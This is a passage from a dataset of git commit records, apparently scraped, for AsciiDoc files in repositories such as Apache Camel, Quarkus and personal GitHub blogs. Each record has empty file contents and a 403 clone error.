{"commit":"aab7d2147babd311bee1c9e33724636e26f95ab5","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37eb29472a77db079a58f12f136277c08793dbff","subject":"CAMEL-9679: Support for 
Hessian serialization - add docs","message":"CAMEL-9679: Support for Hessian serialization - add docs\n","repos":"RohanHart\/camel,dmvolod\/camel,mgyongyosi\/camel,apache\/camel,isavin\/camel,mgyongyosi\/camel,Fabryprog\/camel,nicolaferraro\/camel,scranton\/camel,jkorab\/camel,Thopap\/camel,drsquidop\/camel,sabre1041\/camel,gnodet\/camel,cunningt\/camel,NickCis\/camel,JYBESSON\/camel,tlehoux\/camel,allancth\/camel,pmoerenhout\/camel,christophd\/camel,nboukhed\/camel,jlpedrosa\/camel,jmandawg\/camel,snurmine\/camel,objectiser\/camel,pkletsko\/camel,isavin\/camel,trohovsky\/camel,lburgazzoli\/camel,pax95\/camel,JYBESSON\/camel,borcsokj\/camel,nicolaferraro\/camel,kevinearls\/camel,jmandawg\/camel,edigrid\/camel,jonmcewen\/camel,chirino\/camel,jlpedrosa\/camel,prashant2402\/camel,sirlatrom\/camel,onders86\/camel,bgaudaen\/camel,sabre1041\/camel,anoordover\/camel,trohovsky\/camel,yuruki\/camel,JYBESSON\/camel,DariusX\/camel,jamesnetherton\/camel,adessaigne\/camel,pmoerenhout\/camel,nikvaessen\/camel,jarst\/camel,sverkera\/camel,sverkera\/camel,ssharma\/camel,sirlatrom\/camel,pax95\/camel,sverkera\/camel,jarst\/camel,gnodet\/camel,dmvolod\/camel,w4tson\/camel,arnaud-deprez\/camel,edigrid\/camel,Thopap\/camel,pmoerenhout\/camel,FingolfinTEK\/camel,snurmine\/camel,scranton\/camel,pax95\/camel,tlehoux\/camel,RohanHart\/camel,kevinearls\/camel,Thopap\/camel,RohanHart\/camel,Thopap\/camel,tadayosi\/camel,erwelch\/camel,jarst\/camel,atoulme\/camel,YoshikiHigo\/camel,jarst\/camel,jamesnetherton\/camel,gautric\/camel,iweiss\/camel,jamesnetherton\/camel,tdiesler\/camel,onders86\/camel,nikvaessen\/camel,allancth\/camel,cunningt\/camel,Fabryprog\/camel,anoordover\/camel,tlehoux\/camel,apache\/camel,tkopczynski\/camel,nboukhed\/camel,bhaveshdt\/camel,oalles\/camel,iweiss\/camel,hqstevenson\/camel,isavin\/camel,sirlatrom\/camel,allancth\/camel,dmvolod\/camel,erwelch\/camel,nikhilvibhav\/camel,yuruki\/camel,apache\/camel,johnpoth\/camel,cunningt\/camel,nboukhed\/camel,oalles\/camel,zregvart\/camel,jlpedrosa\/camel,driseley\/camel,hqstevenson\/camel,veithen\/camel,JYBESSON\/camel,akhettar\/camel,trohovsky\/camel,pmoerenhout\/camel,tdiesler\/camel,hqstevenson\/camel,mcollovati\/camel,anton-k11\/camel,sabre1041\/camel,driseley\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,tadayosi\/camel,scranton\/camel,acartapanis\/camel,lburgazzoli\/camel,ullgren\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,acartapanis\/camel,kevinearls\/camel,mgyongyosi\/camel,tlehoux\/camel,mgyongyosi\/camel,chirino\/camel,jkorab\/camel,Thopap\/camel,CodeSmell\/camel,isavin\/camel,borcsokj\/camel,objectiser\/camel,nikhilvibhav\/camel,jkorab\/camel,jmandawg\/camel,erwelch\/camel,driseley\/camel,snurmine\/camel,christophd\/camel,rmarting\/camel,nikvaessen\/camel,acartapanis\/camel,erwelch\/camel,jonmcewen\/camel,johnpoth\/camel,anton-k11\/camel,punkhorn\/camel-upstream,cunningt\/camel,anoordover\/camel,YoshikiHigo\/camel,lburgazzoli\/camel,lburgazzoli\/camel,mgyongyosi\/camel,lburgazzoli\/camel,JYBESSON\/camel,kevinearls\/camel,curso007\/camel,hqstevenson\/camel,tkopczynski\/camel,tdiesler\/camel,prashant2402\/camel,anoordover\/camel,ssharma\/camel,dmvolod\/camel,akhettar\/camel,johnpoth\/camel,apache\/camel,hqstevenson\/camel,nicolaferraro\/camel,gautric\/camel,driseley\/camel,sverkera\/camel,chirino\/camel,bgaudaen\/camel,davidkarlsen\/camel,akhettar\/camel,edigrid\/camel,FingolfinTEK\/camel,jmandawg\/camel,johnpoth\/camel,alvinkwekel\/camel,christophd\/camel,onders86\/camel,scranton\/camel,mcollovati\/camel,rmarting\/camel,nboukhe
d\/camel,YoshikiHigo\/camel,sabre1041\/camel,pax95\/camel,FingolfinTEK\/camel,DariusX\/camel,atoulme\/camel,gilfernandes\/camel,edigrid\/camel,pax95\/camel,rmarting\/camel,gautric\/camel,FingolfinTEK\/camel,yuruki\/camel,atoulme\/camel,curso007\/camel,gilfernandes\/camel,nikhilvibhav\/camel,tdiesler\/camel,jamesnetherton\/camel,adessaigne\/camel,curso007\/camel,prashant2402\/camel,DariusX\/camel,veithen\/camel,christophd\/camel,pkletsko\/camel,alvinkwekel\/camel,YoshikiHigo\/camel,ssharma\/camel,mgyongyosi\/camel,jamesnetherton\/camel,christophd\/camel,rmarting\/camel,rmarting\/camel,w4tson\/camel,bgaudaen\/camel,bhaveshdt\/camel,davidkarlsen\/camel,drsquidop\/camel,trohovsky\/camel,dmvolod\/camel,davidkarlsen\/camel,oalles\/camel,tkopczynski\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,atoulme\/camel,neoramon\/camel,tkopczynski\/camel,jlpedrosa\/camel,jkorab\/camel,zregvart\/camel,davidkarlsen\/camel,arnaud-deprez\/camel,neoramon\/camel,gautric\/camel,nikhilvibhav\/camel,zregvart\/camel,edigrid\/camel,prashant2402\/camel,bhaveshdt\/camel,RohanHart\/camel,neoramon\/camel,veithen\/camel,tlehoux\/camel,kevinearls\/camel,cunningt\/camel,arnaud-deprez\/camel,anoordover\/camel,jonmcewen\/camel,lburgazzoli\/camel,gilfernandes\/camel,DariusX\/camel,acartapanis\/camel,gilfernandes\/camel,tadayosi\/camel,pmoerenhout\/camel,atoulme\/camel,hqstevenson\/camel,ullgren\/camel,gnodet\/camel,chirino\/camel,allancth\/camel,neoramon\/camel,jlpedrosa\/camel,borcsokj\/camel,curso007\/camel,jmandawg\/camel,iweiss\/camel,sabre1041\/camel,pkletsko\/camel,mcollovati\/camel,johnpoth\/camel,nboukhed\/camel,anton-k11\/camel,akhettar\/camel,tdiesler\/camel,snurmine\/camel,apache\/camel,rmarting\/camel,drsquidop\/camel,adessaigne\/camel,edigrid\/camel,borcsokj\/camel,tadayosi\/camel,nikvaessen\/camel,bgaudaen\/camel,jmandawg\/camel,adessaigne\/camel,drsquidop\/camel,iweiss\/camel,gnodet\/camel,kevinearls\/camel,gautric\/camel,gilfernandes\/camel,NickCis\/camel,akhettar\/camel,drsquidop\/camel,prashant2402\/camel,johnpoth\/camel,allancth\/camel,ssharma\/camel,ullgren\/camel,sirlatrom\/camel,Fabryprog\/camel,acartapanis\/camel,yuruki\/camel,pkletsko\/camel,NickCis\/camel,FingolfinTEK\/camel,adessaigne\/camel,bgaudaen\/camel,trohovsky\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,anton-k11\/camel,jonmcewen\/camel,salikjan\/camel,onders86\/camel,veithen\/camel,CodeSmell\/camel,objectiser\/camel,alvinkwekel\/camel,isavin\/camel,bgaudaen\/camel,jarst\/camel,onders86\/camel,akhettar\/camel,lburgazzoli\/apache-camel,snurmine\/camel,salikjan\/camel,chirino\/camel,drsquidop\/camel,erwelch\/camel,iweiss\/camel,snurmine\/camel,neoramon\/camel,veithen\/camel,borcsokj\/camel,NickCis\/camel,cunningt\/camel,ssharma\/camel,onders86\/camel,anton-k11\/camel,alvinkwekel\/camel,dmvolod\/camel,objectiser\/camel,sirlatrom\/camel,chirino\/camel,jamesnetherton\/camel,sverkera\/camel,jonmcewen\/camel,sverkera\/camel,FingolfinTEK\/camel,pax95\/camel,neoramon\/camel,arnaud-deprez\/camel,punkhorn\/camel-upstream,pkletsko\/camel,veithen\/camel,tadayosi\/camel,ssharma\/camel,pkletsko\/camel,jkorab\/camel,jlpedrosa\/camel,RohanHart\/camel,oalles\/camel,sirlatrom\/camel,yuruki\/camel,lburgazzoli\/apache-camel,jarst\/camel,jkorab\/camel,arnaud-deprez\/camel,oalles\/camel,arnaud-deprez\/camel,driseley\/camel,zregvart\/camel,scranton\/camel,isavin\/camel,bhaveshdt\/camel,anoordover\/camel,adessaigne\/camel,YoshikiHigo\/camel,w4tson\/camel,acartapanis\/camel,iweiss\/camel,RohanHart\/camel,gilfernandes\/camel,nboukhed\/camel,allancth\/cam
el,w4tson\/camel,jonmcewen\/camel,Thopap\/camel,JYBESSON\/camel,gnodet\/camel,borcsokj\/camel,apache\/camel,yuruki\/camel,bhaveshdt\/camel,ullgren\/camel,bhaveshdt\/camel,erwelch\/camel,lburgazzoli\/apache-camel,NickCis\/camel,mcollovati\/camel,w4tson\/camel,lburgazzoli\/apache-camel,scranton\/camel,curso007\/camel,nicolaferraro\/camel,lburgazzoli\/apache-camel,gautric\/camel,atoulme\/camel,NickCis\/camel,driseley\/camel,trohovsky\/camel,anton-k11\/camel,w4tson\/camel,tkopczynski\/camel,tdiesler\/camel,prashant2402\/camel,oalles\/camel,curso007\/camel,sabre1041\/camel,Fabryprog\/camel,YoshikiHigo\/camel,nikvaessen\/camel,tlehoux\/camel,nikvaessen\/camel","old_file":"components\/camel-snakeyaml\/src\/main\/docs\/hessian.adoc","new_file":"components\/camel-snakeyaml\/src\/main\/docs\/hessian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bhaveshdt\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c5619d1a0f3d89b4e4206bcf7dc313aeaf02dea","subject":"Minor doc edit","message":"Minor doc edit\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/Extension Authors Guide.adoc","new_file":"docs\/src\/main\/asciidoc\/Extension Authors Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0535f660ad944927efcc6a18592749f7787bcb2a","subject":"updating to latest Docker CE","message":"updating to latest Docker CE\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afc750111e5c53c56139ce710d1947989aa8daef","subject":"y2b create post Add Buttons to your Phone?","message":"y2b create post Add Buttons to your Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-17-Add-Buttons-to-your-Phone.adoc","new_file":"_posts\/2015-05-17-Add-Buttons-to-your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"450353daa4269f692c47cbaafb2c0a860d2e6c9d","subject":"Update 2019-02-16-Ten-Stars-of-Country-Music.adoc","message":"Update 2019-02-16-Ten-Stars-of-Country-Music.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2019-02-16-Ten-Stars-of-Country-Music.adoc","new_file":"_posts\/2019-02-16-Ten-Stars-of-Country-Music.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b84f82d7d432ac6b1749848d1be250867a52d87","subject":"y2b create post This Lasagna Lasts 20 YEARS!","message":"y2b create post This Lasagna Lasts 20 YEARS!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-10-This-Lasagna-Lasts-20-YEARS.adoc","new_file":"_posts\/2016-07-10-This-Lasagna-Lasts-20-YEARS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df71f312fa22f31ae2ce159392807ef2b234995c","subject":"Added removeProperty EIP docs","message":"Added removeProperty EIP docs\n","repos":"snurmine\/camel,pax95\/camel,ullgren\/camel,anoordover\/camel,tadayosi\/camel,pmoerenhout\/camel,anoordover\/camel,pax95\/camel,pmoerenhout\/camel,CodeSmell\/camel,mcollovati\/camel,Fabryprog\/camel,jonmcewen\/camel,tdiesler\/camel,jonmcewen\/camel,DariusX\/camel,cunningt\/camel,nicolaferraro\/camel,onders86\/camel,cunningt\/camel,alvinkwekel\/camel,dmvolod\/camel,jamesnetherton\/camel,curso007\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,jamesnetherton\/camel,gautric\/camel,DariusX\/camel,apache\/camel,jamesnetherton\/camel,anoordover\/camel,akhettar\/camel,ullgren\/camel,zregvart\/camel,gnodet\/camel,onders86\/camel,snurmine\/camel,davidkarlsen\/camel,curso007\/camel,apache\/camel,pmoerenhout\/camel,gnodet\/camel,DariusX\/camel,onders86\/camel,tadayosi\/camel,akhettar\/camel,gautric\/camel,jonmcewen\/camel,akhettar\/camel,christophd\/camel,tdiesler\/camel,onders86\/camel,CodeSmell\/camel,dmvolod\/camel,snurmine\/camel,alvinkwekel\/camel,sverkera\/camel,jonmcewen\/camel,kevinearls\/camel,sverkera\/camel,sverkera\/camel,nikhilvibhav\/camel,sverkera\/camel,jamesnetherton\/camel,pax95\/camel,objectiser\/camel,cunningt\/camel,objectiser\/camel,CodeSmell\/camel,Fabryprog\/camel,pmoerenhout\/camel,zregvart\/camel,sverkera\/camel,apache\/camel,adessaigne\/camel,DariusX\/camel,dmvolod\/camel,pmoerenhout\/camel,nicolaferraro\/camel,snurmine\/camel,nicolaferraro\/camel,alvinkwekel\/camel,snurmine\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,jamesnetherton\/camel,apache\/camel,punkhorn\/camel-upstream,tadayosi\/camel,adessaigne\/camel,davidkarlsen\/camel,jonmcewen\/camel,cunningt\/camel,gnodet\/camel,nikhilvibhav\/camel,zregvart\/camel,apache\/camel,kevinearls\/camel,jamesnetherton\/camel,anoordover\/camel,christophd\/camel,kevinearls\/camel,pax95\/camel,adessaigne\/camel,objectiser\/camel,gautric\/camel,curso007\/camel,dmvolod\/camel,gautric\/camel,mcollovati\/camel,davidkarlsen\/camel,akhettar\/camel,gautric\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,tdiesler\/camel,christophd\/camel,tdiesler\/camel,onders86\/camel,punkhorn\/camel-upstream,curso007\/camel,nikhilvibhav\/camel,mcollovati\/camel,akhettar\/camel,sverkera\/camel,kevinearls\/camel,ullgren\/camel,dmvolod\/camel,gautric\/camel,tdiesler\/camel,pmoerenhout\/camel,adessaigne\/camel,jonmcewen\/camel,nicolaferraro\/camel,objectiser\/camel,Fabryprog\/camel,onders86\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,kevinearls\/camel,zregvart\/camel,dmvolod\/camel,tadayosi\/camel,kevinearls\/camel,curso007\/camel,ullgren\/camel,adessaigne\/camel,pax95\/camel,curso007\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,Fabryprog\/camel,akhettar\/camel,CodeSmell\/camel,anoor
dover\/camel,gnodet\/camel,mcollovati\/camel,tadayosi\/camel,anoordover\/camel,cunningt\/camel,adessaigne\/camel,snurmine\/camel,cunningt\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeProperty-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/removeProperty-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c45b7bb7fe97aa21371c761d828ab833fa9a7e8","subject":"Update 2015-06-10-Wednesday.adoc","message":"Update 2015-06-10-Wednesday.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-10-Wednesday.adoc","new_file":"_posts\/2015-06-10-Wednesday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871a6fb2af12238d26985544daf539ac1f406610","subject":"Update 2079-07-15-Test-Post.adoc","message":"Update 2079-07-15-Test-Post.adoc","repos":"TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting","old_file":"_posts\/2079-07-15-Test-Post.adoc","new_file":"_posts\/2079-07-15-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TunnyTraffic\/gh-hosting.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdbfab0eb7adfa96d07ead766ad3ef3a0b515a1d","subject":"y2b create post Is This The Toothbrush Of The Future?","message":"y2b create post Is This The Toothbrush Of The Future?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-28-Is-This-The-Toothbrush-Of-The-Future.adoc","new_file":"_posts\/2016-11-28-Is-This-The-Toothbrush-Of-The-Future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2c03b7dca1e506085941e7fb73a09fedd2162f","subject":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","message":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdf44dfdad4e200d1ae78d3c671ceac51b4b203d","subject":"y2b create post Galaxy S4 Giveaway Update - CLICK HERE!","message":"y2b create post Galaxy S4 Giveaway Update - CLICK 
HERE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-10-Galaxy-S4-Giveaway-Update--CLICK-HERE.adoc","new_file":"_posts\/2013-05-10-Galaxy-S4-Giveaway-Update--CLICK-HERE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"617b94769a546f3c1e2ea83a7799b126b13caf8b","subject":"Update 2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","message":"Update 2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","new_file":"_posts\/2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aabbff4656f69ad18bb70fa949373b5d6fd9c97f","subject":"Fixing pom.xml path for maven sample","message":"Fixing pom.xml path for maven sample\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d20395362ae4b97568b688d609673866ff9e70eb","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e70ebadf380b5af9da88ac2693dd2a725d37819c","subject":"Update 2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","message":"Update 2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","new_file":"_posts\/2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"377012cb9f21b3fffb5f32d4853c3ba51da69431","subject":"New readme to explain the examples 
directory.","message":"New readme to explain the examples directory.\n","repos":"hypatia-software-org\/hypatia-engine,brechin\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"examples\/readme.adoc","new_file":"examples\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e4cef5a3c0ffeb2980d5e81917c9e552c1b8f3","subject":"adds ReadMe File","message":"adds ReadMe File\n\npart of #7\n","repos":"rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC","old_file":"mongodb-redis-integration\/ReadMe.adoc","new_file":"mongodb-redis-integration\/ReadMe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rajadileepkolli\/POC.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23b3e46cab95e92cb50ba792f4b47dc2ca54fb8f","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69b248687ad12ab25edbf502dcb007ce4180a144","subject":"Renamed document.","message":"Renamed document.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/build_sources_netbeans_svn.adoc","new_file":"src\/docs\/asciidoc\/jme3\/build_sources_netbeans_svn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"3458d81ffdd12615106cfc503ce95c1490c31393","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"940c6c1524357e96971fbe2bd835b310a2eafc9d","subject":"y2b create post Can Your Pen Do This?","message":"y2b create post Can Your Pen Do This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-15-Can-Your-Pen-Do-This.adoc","new_file":"_posts\/2017-01-15-Can-Your-Pen-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ec3eb18a8bd72311ead1868b6b52fcc6c586515","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dac9d6116f681978cf372e4dea1ea548ba62c82d","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a0a22fdd2d6c7d90688c5d11a7d872a609334fb","subject":"added license file","message":"added license file\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh","old_file":"LICENSE.adoc","new_file":"LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"912e55f6c40d58fcd0c96503dabca1ce7724111c","subject":"add haskell file","message":"add haskell file\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Haskell.adoc","new_file":"Haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 